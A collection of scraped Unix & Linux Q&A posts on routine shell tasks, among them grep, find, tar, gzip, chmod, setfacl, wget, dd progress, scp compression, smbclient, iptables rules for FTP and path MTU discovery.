find . -type f -name "*.cpp" -exec grep -r zlib {} +
or if you are using a bash shell, set a nullglob option to stop returning un-expanded glob as a valid result. The (..) is to make the extended shell option temporary and not make it persistent in the shell. The reason to have the --include=*.cpp option is, with the option set, if the glob expansion fails *.cpp becomes empty and your command becomes grep -r zlib which means search in entire sub-directory below.
( shopt -s nullglob; grep -r --include=*.cpp zlib . ; )
Another variant that doesn't include the --include option of grep but using the globstar that allows recursive glob expansion in sub-directories
( shopt -s nullglob globstar; grep -rH zlib **/*.cpp ; )
Remember the --include= and -H are GNU grep options and not POSIX compatiable
| Grepping across multiple directories |
1,425,972,805,000 |
The program "zip" has a -R feature which allows one to zip all files with a certain name in a directory tree: zip -r v/s zip -R
For example:
zip -R bigfile "bigfile"
Will zip all of the following:
./bigfile
./a/bigfile
./a/b/bigfile
./a/b/c/bigfile
.......
The -R feature doesn't seem to be in gzip or xz though. I've tried it, and I've also checked the man pages.
So how may I emulate this behavior in gzip and xz?
|
Combining find, tar and the compression utilities:
With gzip:
find . -type f -name bigfile | tar cfz bigfile.tgz -T -
or with xz:
find . -type f -name bigfile | tar cfJ bigfile.txz -T -
find searches recursively for all files named bigfile under the current/working directory and the resulting pathnames are supplied to tar that creates a tarball and compresses it.
These commands are suited for the example supplied in the question. Different patterns supplied to zip -R will require corresponding arguments supplied to find.
Also keep in mind that this won't work for all possible filenames; you should consider the --null option and feed tar from find -print0.
Also tar's "-T" option is not available on every systems (for instance in HP-UX).
EDIT1
Unlike zip, rar or 7-zip, for example, gzip and xz are not capable of compressing multiple files into one.
Quoting the gzip manpage:
If you wish to create a single archive file with multiple members so that members can later be extracted independently, use an archiver such as tar or zip. GNU tar supports the -z option to invoke gzip transparently. gzip is designed as a complement to tar, not as a replacement.
See How to gzip multiple files into one gz file? and How do I compress multiple files into a .xz archive?.
EDIT2
If the goal of the OP is to make a gzip file for each file it finds that satisfies the search criteria the following command should be issued:
find . -type f -name bigfile | gzip > bigfile.gz
For a xz file:
find . -type f -name bigfile | xz > bigfile.xz
It will create a compressed file in the same directory for each file that satisfies the search criteria leaving the original file "untouched".
EDIT3
As suggested by @Kusalananda, if in bash you first do:
shopt -s globstar
and then issue the command:
tar -c -zf bigfile.tgz ./**/bigfile
a single archive file will be created with the multiple files found in subdirectories that satisfies the search criteria.
If the goal is to create one compressed file for each file found in subdirectories that satisfies the search criteria, after issuing the shopt command, you can just issue:
gzip ./**/bigfile
| How may I emulate the -R feature of "zip", but in gzip and xz? |
1,425,972,805,000 |
I have lots of tar(.tar.bz2) files containing multiple file types in a recursive directory.
I want to extract just one type of file(let's say .txt files) from all the directories. How do i do that?
I have this command to extract all the files in each directory:
for file in *.tar.bz2; do tar -jxf "${file}"; done
I want to extract only the ".txt" files instead of all.
|
Quoting the GNU tar manpage:
Thus, to extract files whose names end in `.c', you can use:
$ tar -xf foo.tar -v --wildcards '*.c'
So for you case, I'd go with:
for file in *.tar.bz2; do tar -jxf "${file}" --wildcards '*.txt'; done
| how to untar specific files recursively in linux? [duplicate] |
1,425,972,805,000 |
This question has parallels to question "touch all folders in a directory".
How to touch everything in a directory,
recursively
including hidden entries, like "directory up" .. and .
without de-referencing symbolic links touch -h and
use a reference file touch -r <file> as the the time stamp source
from within a shell-script?
|
If your touch command supports -h for no dereference:
find . -depth -exec touch -h -r "$reference_file" {} +
touch -c -h -r "$reference_file" ..
(note that -h implies -c (to avoid creating the file if it didn't exist with NetBSD/FreeBSD, but not with GNU or busybox touch (though with GNU touch it wouldn't create files either and print an error message), so adding -c here for increased portability).
Or with with a single find command which could reduce the number of touch commands being run:
find .. . -depth \( ! -name .. -o -prune \) -exec touch -c -h -r "$reference_file" {} +
That is, add .. to the list of files given to find, but tell find to prune it (not descend into it).
For an arbitrary directory (well one whose path doesn't start with -:
find "$dir/.." "$dir/" \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" {} +
(here using $dir/ instead of $dir for the case where $dir refers to a symlink to a directory).
With BSD find, you can use
find -f "$dir/.." -f "$dir/" \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" -- {} +
to avoid the problems with $dir starting with -.
Though you might as well do:
(
cd -P -- "$dir/" &&
exec find .. . \( ! -name .. -o -prune \) \
-exec touch -c -h -r "$reference_file" {} +
)
(assuming $reference_file is not a relative path).
Note that if $reference_file is a symlink, with GNU touch and with -h, the modification time of the symlink will be used (that of the target would be used without -h) while with NetBSD (where -h comes from) and FreeBSD touch, the modification time of the target is used with or without -h.
If using zsh, you could use its recursive globbing
autoload zargs
zargs -- $dir/{.,..,**/*(NDoN)} -- touch -c -h -r $reference_file --
(the oN for not sorting the list can be omitted, that's just for optimisation).
ksh93 eventually added support for zsh's recursive globbing in 2005, with the globstar option.
(set -o globstar; FIGNORE=
command -x touch -c -h -r "$reference_file" -- ~(N)"$dir"/**)
Note however that ksh will include all . and .. entries here so all directories will be touched several times.
bash eventually copied ksh93's globstar in 2009, but was initially /broken/ in that it was following symlinks when descending directories. It was fixed in 4.3 in 2014.
bash doesn't have the equivalent of zsh's zargs or ksh93's command -x to split command lines so as to avoid the arg list too long issues. On a GNU system, you could always use GNU xargs for that:
xargs -r0a <(
shopt -s dotglob nullglob globstar
printf '%s\0' "$dir/"{.,..,**}
) touch -c -h -r "$reference_file" --
Now, I would probably still use find here. Beside the poorer performance, another issue with globs is that errors (like access denied) when traversing the directory tree are silently ignored.
| How to touch everything in a directory including hidden, like directory up `..`? |
1,425,972,805,000 |
I want to execute a script on startup. The script is recursive and calls itself.
When I added systemd unit for the same, it is executing but getting stopped in 1 min due to DefaultTimeoutStartSec. It assumes that my script has not yet started.
Following is the service file I have created
[Unit]
Description = My Desc
After = network.target
[Service]
Type = forking
ExecStart = /root/my_recursive_script.sh
[Install]
WantedBy = multi-user.target
I know I can make this service as working by adding TimeoutSec to infinity but that would be workaround. When I execute my service with
systemctl start myservice.service
it does not leave the cursor until timeout encounter.
What is the proper way to make systemd units work with recursive script?
Do I need to make changes in my script to make it executable like daemon?
|
The issue is you have set the service type to forking. Systemd is waiting for you ExecStart to fork to background before proceeding. You need to change the type to simple. See the manual
| Start Recursive Script as systemd unit |
1,425,972,805,000 |
There are about 50 HTML/js files in the folder name site,
some of the files contain (below lines are combined from files)
{"rendered":"http:\/\/localhost:4542\/?page_id=854"}
http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/
src=\"http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/B
http:\/\/localhost:4542\/wp-content\/uploads\/2022\/09\/A
replies":[{"embeddable":true,"href":"http:\/\/localhost:4542\/en\/wp-json
Any tool/ commands to replace http:\/\/localhost:4542 to https:example.com recursively in all files of a folder?
Working on a macOS now.
|
You can try using the command find with -exec argument:
find /path/to/folder -type f -regex '.*\.\(js\|html\)' -exec sed -i 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
On Mac Os you can use a similar syntax:
find /path/to/folder -E -type f -regex '.*\.(js|html)' -exec sed -i '.bak' 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
I really hope that works, I don't have a Mac to test it, but it should work.
On Mac Os when you specify the -i option the backup file name extension is required. You can use any value instead of '.bak'
Credits:
How to use find command to search for multiple extensions,
sed command with -i option failing on Mac
Note: I'm not sure if this code will work in Mac Os, but you can try it too:
find /path/to/folder -iname "*.html" -o -iname "*.js" -exec sed -i 's#http:\\/\\/localhost:4542#https:example.com#g' {} +
| How to replace all matched strings in the files recursively? |
1,425,972,805,000 |
I have a folder that has many subfolders in it. I want to list all the files in all the subfolders but I want the files sorted by subfolder name. I'm not interested in files in the current directory.
Currently I am using this command which gets me the correct filename & path output I desire, with the exception that it is not sorted by subfolder.
find -type f
ex data:
8585/file10.txt
8585/file83.txt
34032/file130.txt
10/file5400.txt
desired sorted output:
10/file5400.txt
8585/file83.txt
8585/file10.txt
34032/file130.txt
Thanks in advance for any help!
|
Pipe the data from find into sort. The default setting for sort is according to your locale, typically alphanumeric. If that's not giving you the sorting order you want, and you have GNU sort, try with the -V flag as in my example,
find -type f | sort -V
See man sort for the details
| List all files in subdirectories sort by subdirectory name |
1,425,972,805,000 |
I have a large file structure with multiple nested folders. I would like to tar+gzip up every folder with a specific name and remove the original folder.
In this example the script I hope to have would detect every folder ending in .abc and tar+gzip that folder up, removing the original folder and leaving .gz.
Main Folder/
Project 1/
Prj1FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj1FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj1FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 2/
Prj2FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj2FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj2FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 3/
Prj3FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj3FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj3FolderC.abc/
...lots of tiny files and maybe subfolders...
Project 4/
Another Folder Inside/
Prj4FolderA.abc/
...lots of tiny files and maybe subfolders...
Prj4FolderB.abc/
...lots of tiny files and maybe subfolders...
Prj4FolderC.abc/
...lots of tiny files and maybe subfolders...
After running this script, I would like the folder to look like:
Main Folder/
Project 1/
Prj1FolderA.abc.tar.gz
Prj1FolderB.abc.tar.gz
Prj1FolderC.abc.tar.gz
Project 2/
Prj2FolderA.abc.tar.gz
Prj2FolderB.abc.tar.gz
Prj2FolderC.abc.tar.gz
Project 3/
Prj3FolderA.abc.tar.gz
Prj3FolderB.abc.tar.gz
Prj3FolderC.abc.tar.gz
Project 4/
Another Folder Inside/
Prj4FolderA.abc.tar.gz
Prj4FolderB.abc.tar.gz
Prj4FolderC.abc.tar.gz
This is just an example and the names of the folders may not be exactly as above, nor are they all exactly 2 levels deep. There could be multiple folders in between.
I'm assuming using find to do this, but I'm not quite sure how to pass the proper info into tar and delete the original folder. Thanks!
|
Run this in Main Folder:
find . -type d -name '*.abc' -exec sh -c '
for d; do tar -C "$d" -zcf "$d.tar.gz" . && rm -r "$d"; done
' findsh {} +
Although I tested it, I recommend you to test it too. Put an echo before rm, so if anything goes wrong you do not lose your data.
The inner loop executes tar and rm (only if tar was successful) for found child directories matching the '*.abc' glob pattern.
| How do I recursively tar+gzip folders with a specific name? |
1,425,972,805,000 |
I grasp the heading of this question odd, but I do wonder if in some situations there should be a need to take extra caution and somehow "enforce" non-recursivness when changing permissions with chmod nonrecursively (without the -R argument).
Say I have a directory ~/x. This dir has a few files, as well as a sub-dir ~/x/y that also has a few files, and I decided to make all x files executable without effecting files at y. I could execute:
chmod +x ~/x/*
Surly the chmod should do the job and it's unlikely that in any Bash version (including future versions) the POSIX logic would be changed and the above chmod would effect the sub dir as well, but I do wonder if there could be any situations in Bash (or common shells) in which chmod +x ~/x/* will also cover the y files, and how to improve my command to protect from such undesired change?
|
You can use find and restricting to get only files in the current directory
find ~/x -maxdepth 1 -type f -exec chmod +x {} +
| Make all files in a dir executable (non-recursively) while strictly-ensuring non-recursivness |
1,425,972,805,000 |
I need to delete recursive subfolders in a single line.
For one subfolder:
find folder -name "subfolder" -exec rm -r "{}" \;
or
find folder -name "subfolder" -type d -exec rm -r "{}" \;
But in the case of several subfolders in a single line? (subfolder1, subfolder2 or foo, bar, dummy…)
|
What I would do :
find folder -name "subfolder[0-9]*" -exec rm -r {} \;
using a glob
or
find folder \( -name 'foo' -o -name 'bar' -o name 'base' \) -exec rm -r {} \;
| Delete recursive subfolders with find |
1,425,972,805,000 |
I'm new to shell, and UNIX / GNU/Linux.
I'm trying to understand this syntax that is part of a recursion function:
[ $i -le 2 ] && echo $i || { f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
(taken from here)
the full related function is:
factorial(){
local i=$1
local f
declare -i i
declare -i f
[ $i -le 2 ] && echo $i || { f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
}
I understand [$i -le 2 ] means check if there are at-least 2 positional arguments, I just don't understand what is the double pipe symbol (or?). Also what do the {} do? are they kind of a 4 arguments for loop?
Thanks,
David
|
First,
local i=$1
assigns the value of $1 to i. $1 is the first argument of the function. Or outside of a function, it stands for the first positional parameter of a command or script.
The following are quite intuitive. -i means the variable is an integer.
local f
declare -i i
declare -i f
Now to the long one. I'll break it down into separate lines for clarity.
[ $i -le 2 ] #checks if $i is less or equal 2
&& #this is logical AND. This is used so: X && Y, meaning if X computes to true, then compute Y. So for this function, the meaning is: if $i less or equals 2, do the following:
echo $i #this follows the logical && above, so is computed conditionally. Namely, print $i.
|| #this is logical OR, so what follows is computed only if what's on the left boils down to false.
#Here the meaning is, IF NOT $i -le 2 AND echo... (which doesn't matter), do what's on the right. So do what's in the {} braces, if $i is greater than 2.
And now this is left:
{ f=$(( i - 1)); f=$(factorial $f); f=$(( f * i )); echo $f; }
The braces {} make what's in them a block, which is treated as an entity. To explain it appearing here most simply, the logic introduced before with && and || now applies to the whole block. Now to the parts.
f=$(( i - 1));
$(( )) is an arithmetic operator. f= you should know by now. The whole expression means assign to f the value of i - 1.
Notice how the parts of a block are ended with a semicolon ;.
f=$(factorial $f);
The above calls the function. This is the place of recursion. Literal meaning: assign to f the return value of the function factorial called with the $f as an argument. (Assignment doesn't require the $, as you may have noticed.) The $( ) is a command substitution. You can call a function by simply calling its name, but for a variable value assignment, the value has to be passed somehow, and that's how it's done here.
f=$(( f * i ));
Above you see the arithmetical operator again, ie $(( )). f gets here the value of f, which by now is equal to $(factorial $f), multiplied by i, which is equal to the $1 argument of the function.
And finally, print the value of f:
echo $f;
| explain recursion syntax |
1,425,972,805,000 |
I'm attempting to get a list of all files under specific folders, recursively, with the "find" command.
find / -path "/usr/sbin/*" -o -path "/usr/bin/*" -o -path "/usr/local/sbin/*"-o -path "/usr/local/bin/*" -o -path "/sbin/*" -o -path "/bin/*" -o -path "*/etc/*"
The previous command, doesn't list the contents of /sbin and /bin , even though they do have content.
Any ideas of how to get there?
|
/sbin is a symlink to /usr/sbin and /bin is a symlink to /usr/bin.
ls -ld /bin /sbin will show you this.
| "find" doesn't list all files under specific directories |
1,425,972,805,000 |
I have wrote the following script:
#!/bin/bash
if [ $# -eq 0 ]
then
read current_dir
else
current_dir=$1
fi
function print_tree_representation ()
{
for file in `ls -A $1`
do
local times_p=$2
while [ $times_p -gt 0 ]
do
echo -n "----"
times_p=$(( $times_p - 1 ))
done
echo $file
if test -d $file
then
local new_path=$1/$file
local new_depth=$(( $2 + 1 ))
print_tree_representation $new_path $new_depth
fi
done
}
print_tree_representation $current_dir 0
for printing the tree-like structure of the directory passed as argument. However, it doesn't go beyond the second level of depth. I can't figgure out what is wrong.
|
The problem is with this line:
if test -d $file
The $file you have extracted from ls -A doesn't contain the full path. You can fix it by replacing that line with
if test -d "$1/$file"
There's another bug, which is that it'll break all over the place if a filename has spaces in it. Put filenames in quotes.
| Bug in shell script for printing the tree-like structure of the curent diretcory |
1,425,972,805,000 |
I use grep -r all the time to find occurrences of a string within files in a given directory:
$ grep -r "string" app/assets/javascripts
> app/assets/javascripts/my_file.js: this line contains my string
But what if I want to recursively search through more than one subdirectory of my current directory? The only way I can think of is to run grep twice:
$ grep -r "string" app/assets/javascripts
> app/assets/javascripts/my_file.js: this line contains "string"
$ grep -r "string" spec/javascripts
> app/assets/javascripts/my_file.js: "string" appears here, too.
How can I combine the above two grep commans into a single line? I don't want to search through every single file in ., and --exclude-dir isn't practical because there are too many other directories under . for me to explicitly exclude them all.
Is this possible?
|
You can specifiy multiple directories in grep:
grep -r "string" app/assets/javascripts spec/javascripts
Alternatively - sometimes more useful is list files to grep by find, and then grep them, for example
find app/assets/javascripts spec/javascripts -type f -print0 |
xargs -0 grep "string"
or
find app/assets/javascripts spec/javascripts -type f -exec grep -H "string" {} +
| How can I recursively grep through several directories at once? |
1,425,972,805,000 |
With this command
find . -name '*.zip' -exec unzip '{}' ';'
we find all zip files under . (directory), then unzip them into the current working directory,
However, the structure is gone.
/backUp/pic1/1-1.zip
/backUp/pic1/1-2.zip
/backUp/pic2/2-1.zip
/backUp/pic2/2-2.zip
/backUp/pic3/3-1.zip
/backUp/pic3/3-2.zip
/backUp/pic3/3-3.zip
Current command result:
/new/1-1
/new/1-2
/new/2-1
/new/2-2
/new/3-1
/new/3-2
/new/3-3
desired result
/new/pic1/1-1
/new/pic1/1-2
/new/pic2/2-1
/new/pic2/2-2
/new/pic3/3-1
/new/pic3/3-2
/new/pic3/3-3
Asked here, but the code doesn't work out
What should dirname and basename be in this command?
|
You can use find with the -execdir argument instead of -exec.
-execdir will run the command in the directory it has found the files in, instead of your current working directory
Example:
find . -name '*.zip' -execdir unzip {} \;
While this is not exactly what you've asked for, you could add a few steps to get to the desired result:
mkdir new
cp -a backUP/* new/
#run unzip operation
cd new
find . -name '*.zip' -execdir unzip {} \;
#remove all .zip files
find . -name '*.zip' -exec rm {} \;
| For all zips, and unzip in working directory and maintains its structure |
1,425,972,805,000 |
Let's suppose I have the following timestamp like directory tree:
root
|__ parent1
| |__ 2021
| | |__ 01
| | | |__ 22
| | | | |__ 12H
| | | | | |__ file1
| | | | | |__ file2
| | | | |__ 13H
| | | | | |__ file1
| | | | | |__ file2
| | | |__ 23
| | | | |__ 12H
| | | | | |__ file1
| | | | | |__ file2
| | | | |__ 13H
| | | | | |__ file1
| | | | | |__ file2
|__ parent2
| |__ etc
What I would like is to recursively navigate through this folder structure, so that, for each folder parent1, parent2, etc., would display the most recent timestamp found, along with a count of the files contained.
For example, something like:
PARENT | LAST_TIMESTAMP | COUNT |
--------------------------------------------
parent1 | 2021-01-23T13:00:00 | 2 |
parent2 | 2022-01-01T00:00:00 | 5 | (dummy example)
... ... ...
I have seen other answers but all of them take into account just the modification date of the files in all the folders, while in this case it would have to do with the name of the folders only.
|
Using find and a perl one-liner:
This use a tab to separate the timestamp and the filename, and NUL to separate each record - so will work with any filenames, including those containing newlines.
find .. -type f -printf '%T@\t%p\0' |
perl -MDate::Format -0ne '
($t,$f) = split /\t/,$_,2;
(undef,$p) = split "/", $f;
$T{$p} = $t if ($t > $T{$p});
$count{$p}++;
END {
my $fmt = "%-20s | %-19s | %5s |\n";
printf "$fmt", "PARENT", "LAST_TIMESTAMP", "COUNT";
print "-" x 52, "\n";
foreach (sort keys %T) {
printf $fmt, $_, time2str("%Y-%m-%dT%H:%M:%S",$T{$_}), $count{$_}
}
}'
It produces output like:
PARENT | LAST_TIMESTAMP | COUNT |
---------------------|---------------------|-------|
foo | 2021-07-16T22:54:22 | 4 |
bar | 2021-06-29T12:25:06 | 13 |
baz | 2021-07-14T14:31:43 | 5 |
quux | 2021-07-16T19:46:21 | 7 |
Alternatively, if you use perl's File::Find module you won't need to pipe find's output into it:
#!/usr/bin/perl
use strict;
use Date::Format;
use File::Find;
my %T; # hash containing newest timestamp for each top-level dir
my %count; # count of files in each top-level dir
find(\&wanted, @ARGV);
my $fmt = "| %-20s | %-19s | %5s |\n";
my $hfmt = "|-%-20s-|-%-19s-|-%5s-|\n";
#print "-" x 54, "\n";
printf "$fmt", "PARENT", "LAST_TIMESTAMP", "COUNT";
printf $hfmt, "-" x 20, "-" x 19, "-" x 5;
foreach (sort keys %T) {
printf $fmt, $_, time2str("%Y-%m-%dT%H:%M:%S", $T{$_}), $count{$_}
}
#print "-" x 54, "\n";
sub wanted {
return unless -f $File::Find::name;
# uncomment only one of the following statements:
# get the mod time of the file itself
my $t = (stat($File::Find::name))[9];
# get the mod time of the directory it's in
#my $t = (stat($File::Find::dir))[9];
my $p = $File::Find::dir;
$p =~ s:^\.*/::;
$T{$p} = $t if ($t > $T{$p});
$count{$p}++;
};
Save this as, e.g. find-latest.pl, make executable with chmod +x find-latest.pl and give it one or more directories as arguments when you run it:
$ ./find-latest.pl ../
| PARENT | LAST_TIMESTAMP | COUNT |
|----------------------|---------------------|-------|
| foo | 2021-07-16T22:54:22 | 4 |
| bar | 2021-06-29T12:25:06 | 13 |
| baz | 2021-07-14T14:31:43 | 5 |
| quux | 2021-07-16T19:46:21 | 7 |
This requires the perl Date::Format
module. On debian, you can install it with apt-get install libtimedate-perl. It should be packaged for other distros too, otherwise
install with cpan.
Alternatively, you can use the strftime() function from the POSIX module,
which is a core module, and is included with perl.
File::Find is also core perl module, included with perl.
| Recursively traverse directories and retrieve last timestamp file |
1,425,972,805,000 |
Just for curiosity, is it possible to delete contents in a directory which is mounted inside of itself OR in a folder inside it?
For example, I was taking a backup of my Arch installation with Timeshift. I saw that Timeshift mounts / at /run/timeshift/backup/ temporarily. In this case, can I delete contents in my / mounted in this mount point? Or, will it not allow me to delete it's contents recursively?
|
I just tried what you described on Debian inside my user directory. Made a directory test and another directory inside it test/mnt. Then added some test/content. And mounted test to test/mnt like this:
$ sudo mount --bind /home/user/test/ /home/user/test/mnt/
Now, if I delete it like this:
$ rm -r test/*
Or like this:
$ rm -r test/mnt/*
I get all the content deleted, but the /home/user/test/mnt/ is not deleted because it is busy. Issuing the command under root has the same result.
So, it will allow you to delete the contents, except the mount point itself, unless it runs into another error before that.
| Is it possible to delete contents of a directory mounted inside itself? |
1,425,972,805,000 |
I wrote a simple script to delete useless files from a directory using the find command.
Now I'm wondering if I can add lines to the script to flatten directories, but not completely flattened.
e.g.,
If I have a big directory named cleantarget:
cleantarget
Folder A
Folder A1
Folder A2
Folder B
Folder B1
Folder B11
I want the end result to be:
cleantarget
Folder A
Folder B
I do NOT want the result to be:
cleantarget
all my files
There are 16000 files in this directory, so it'd be nice to do this with a script, so I can run it occasionally when the directory gets messed up again.
How do I do this?
EDIT: In essence, this means: I want a script, that will separately flatten each sub-directory within a given target directory. i.e., flatten Folder A, flatten Folder B, and flatten Folder C, and so on until all directories within cleanfolder are flattened.
|
These lines should work:
find "/path/to/cleantarget" -maxdepth 1 -mindepth 1 -type d | while read line; do
find "${line}" -mindepth 2 -type f -exec mv -t "${line}" -i '{}' +
rm -r "${line}"/*/
done
This will flatten Folder A and Folder B, asking if you want to overwrite duplicates, and remove the folders afterwards.
Source: https://unix.stackexchange.com/a/52816/284212
| How do I write a shell script to flatten directories? |
1,425,972,805,000 |
I want to change the ACL and the default ACL for all directories and files in a base directory. In other answers (such as this one), the -R flag is used. However, I get
$ setfacl -R -m u::rwx my_dir/
setfacl: unknown option -- R
Try `setfacl --help' for more information.
# this is different from what's done on, e.g. Ubuntu
# setfacl -R -d -m u::rwx mydir/
$ setfacl -R -m d:u::rwx mydir/
How can I recursively set the ACL permissions on Cygwin?
|
To repeat the command for any file and directory contained in a directory you can use find and its -exec option
find my_dir -exec setfacl -m u::rwx {} \;
| setfacl -R doesn't work on Cygwin |
1,425,972,805,000 |
I have been trying to download specific pages in website.
The site uses common URL to go to next pages like below.
https://example.com/pages/?p=1
https://example.com/pages/?p=2
https://example.com/pages/?p=3 upto 450.
I just want to download those pages and not the hyperlinks that are linked with in the pages (mean not the child pages, just parent file e.g. ?p1 and ?p2 etc).
I have tried using below command, but it is not working.
wget --load-cookies=cookies.txt https://example.com/pages/\?p\=\{1..450\}
Is that mean {..} will not work in wget? If not, are there any option in wget that I can use to achive my goal?
|
Using a shell that understand arithmetic ranges in brace expansions (e.g. bash and ksh93 and zsh):
wget --load-cookies=cookies.txt "https://example.com/pages/?p="{1..450}
This would be expanded (before wget is called) to
wget --load-cookies=cookies.txt "https://example.com/pages/?p="1 "https://example.com/pages/?p="2 "https://example.com/pages/?p="3 ... "https://example.com/pages/?p="450
With curl:
curl --cookie-jar cookies.txt "https://example.com/pages/?p="{1..450}
Saving the output into individual files with curl:
curl --cookie-jar cookies.txt -Ooutfile{1..450}.html "https://example.com/pages/?p="{1..450}
| wget only parent pages using {..} |
1,425,972,805,000 |
I'm running this command to find all the files named deploy.php in my whole project and make a copy of them and place them in the same directory as they were found, with name deploy_bkp.php
find . -type f -name "deploy.php" -exec cp {} deploy_bkp.php \;
But it's not working recursively, it's only working for files on the top directory.
|
According to https://askubuntu.com/questions/497122/find-and-exec-in-found-folder you should use -execdir
Your command should look like this:
find . -type f -name "deploy.php" -execdir cp {} deploy_bkp.php \;
| find and copy exec command not recursive [duplicate] |
1,302,715,144,000 |
I've not used dd all that much, but so far it's not failed me yet. Right now, I've had a dd going for over 12 hours - I'm writing an image back to the disk it came from - and I'm getting a little worried, as I was able to dd from the disk to the image in about 7 hours.
I'm running OSX 10.6.6 on a MacBook with a Core 2 Duo at 2.1ghz/core with 4gb RAM. I'm reading from a .dmg on a 7200rpm hard drive (the boot drive), and I'm writing to a 7200rpm drive connected over a SATA-to-USB connector. I left the blocksize at default, and the image is about 160gb.
EDIT: And, after 14 hours of pure stress, the dd worked perfectly after all. Next time, though, I'm going to run it through pv and track it with strace. Thanks to everyone for all your help.
|
You can send dd a certain signal using the kill command to make it output its current status. The signal is INFO on BSD systems (including OSX) and USR1 on Linux. In your case:
kill -INFO $PID
You can find the process id ($PID above) with the ps command; or see pgrep and pkill alternatives on mac os x for more convenient methods.
More simply, as AntoineG points out in his answer, you can type ctrl-T at the shell running dd to send it the INFO signal.
As an example on Linux, you could make all active dd processes output status like this:
pkill -USR1 -x dd
After outputting its status, dd will continue coping.
| How do I know if dd is still working? |
1,302,715,144,000 |
I always use either rsync or scp in order to copy files from/to a remote machine. Recently, I discovered in the manual of scp (man scp) the flag -C
-C Compression enable. Passes the -C flag to
ssh(1) to enable compression.
Before I discovered this flag, I used to zip before and then scp.
Is it as efficient to just use the -C than zipping and unzipping? When is using one or another process make the transfer faster?
|
It's never really going to make any big difference, but zipping the file before copying it ought to be a little bit less efficient since using a container format such as zip that can encapsulate multiple files (like tar) is unnecessary and it is not possible to stream zip input and output (so you need a temporary file).
Using gzip on the other hand, instead of zip ought to be exactly the same since it's what ssh -C does under the hood... except that gzipping yourself is more work than just using ssh -C.
| What does the `-C` flag exactly do in `scp`? |
1,302,715,144,000 |
I was wondering if there is a way to use Samba to send items to a client machine via the command line (I need to send the files from the Samba server). I know I could always use scp but first I was wondering if there is a way to do it with Samba. Thanks!
|
Use smbclient, a program that comes with Samba:
$ smbclient //server/share -c 'cd c:/remote/path ; put local-file'
There are many flags, such as -U to allow the remote user name to be different from the local one.
On systems that split Samba into multiple binary packages, you may have the Samba servers installed yet still be missing smbclient. In such a case, check your package repository for a package named smbclient, samba-client, or similar.
| Sending files over Samba with command line |
1,302,715,144,000 |
I want to allow incoming FTP traffic.
CentOS 5.4:
This is my /etc/sysconfig/iptables file.
# Generated by iptables-save v1.3.5 on Thu Oct 3 21:23:07 2013
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [133:14837]
-A INPUT -p tcp -m tcp --dport 21 -j ACCEPT
-A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT
-A INPUT -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m tcp --sport 20 -j ACCEPT
COMMIT
# Completed on Thu Oct 3 21:23:07 2013
Also, by default, ip_conntrack_netbios_n module is getting loaded.
#service iptables restart
Flushing firewall rules: [ OK ]
Setting chains to policy ACCEPT: filter [ OK ]
Unloading iptables modules: [ OK ]
Applying iptables firewall rules: [ OK ]
Loading additional iptables modules: ip_conntrack_netbios_n[ OK ]
But the problem is not with that module, as I tried unloading it and still no luck.
If I disable iptables, I am able to transfer my backup from another machine to FTP.
If iptables is enforcing, then transfer failed.
|
Adding NEW fixed it, I believe.
Now, my iptables file look like this..
# Generated by iptables-save v1.3.5 on Thu Oct 3 22:25:54 2013
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [824:72492]
-A INPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --sport 1024:65535 --dport 20:65535 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m state --state ESTABLISHED -j ACCEPT
-A INPUT -j REJECT --reject-with icmp-port-unreachable
-A OUTPUT -p tcp -m tcp --dport 21 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 20 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 1024:65535 --dport 20:65535 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT
COMMIT
# Completed on Thu Oct 3 22:25:54 2013
Typing it as answer, since too many characters are not allowed in comment.. Thank you so much for your help.
| Iptables to allow incoming FTP |
1,302,715,144,000 |
scp works well in all cases, but the Raspberry Pi is to weak to copy files efficiently in a secure environment (lan). The theoretically possible 6,75 MB/s via 54 Mbit wireless lan shrink down to about 1.1 MB/s.
Is there a way to copy files remotely without encryption?
It should be a cli command with no dependencies to extra services (ftp, samba) or at least with a minimum of configuration. I mean, a standard tool that works quite well out-of-the-box with standard programms/services (like scp/ssh).
|
You might be looking for rcp, it performs remote execution via rsh so you will have to rely on that and have in mind that all communication are insecure.
| Copy files without encryption (ssh) in local network |
1,302,715,144,000 |
In a case I can use only UDP and ICMP protocols, how can I discover, in bytes, the path MTU for packet transfer from my computer to a destination IP?
|
I believe what you are looking for, is easiest gotten via traceroute --mtu <target>; maybe with a -6 switch thrown in for good measure depending on your interests.
Linux traceroute uses UDP as a default, if you believe your luck is better with ICMP try also -I.
| Discover MTU between me and destination IP |
1,302,715,144,000 |
I have a home file server that I use Ubuntu on.
Recently, one of my drives filled up so I got another and threw it in there.
I have a very large folder, the directory is about 1.7 T in size and contains a decent amount of files.
I used GCP to COPY the files from the old drive to the new one and it seems to have worked fine.
I want to now validate the new directory on the new drive against the original directory on the old drive before I delete the data from the old drive to free up space. I understand that I can do a CRC check to do this.
